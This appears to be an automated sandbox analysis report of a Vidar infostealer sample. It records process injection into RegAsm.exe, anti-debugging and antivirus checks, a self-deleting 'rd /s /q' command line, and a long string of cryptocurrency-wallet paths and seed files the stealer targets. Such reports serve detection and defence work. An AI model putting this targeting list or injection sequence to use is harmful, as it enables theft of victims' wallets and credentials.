                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.7 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 5820Thread sleep count: 88 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC5AC6 FindFirstFileExW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JDGCGD.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: JDGCGD.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JDGCGD.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JDGCGD.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: JDGCGD.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JDGCGD.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000002.00000002.2641787959.0000000000D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: JDGCGD.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: JDGCGD.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1335 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABE380 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1379 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC9290 GetProcessHeap,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB623F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB6549 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB66A5 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E438 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C99AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0149018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB5008
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB602C cpuid
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB643C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
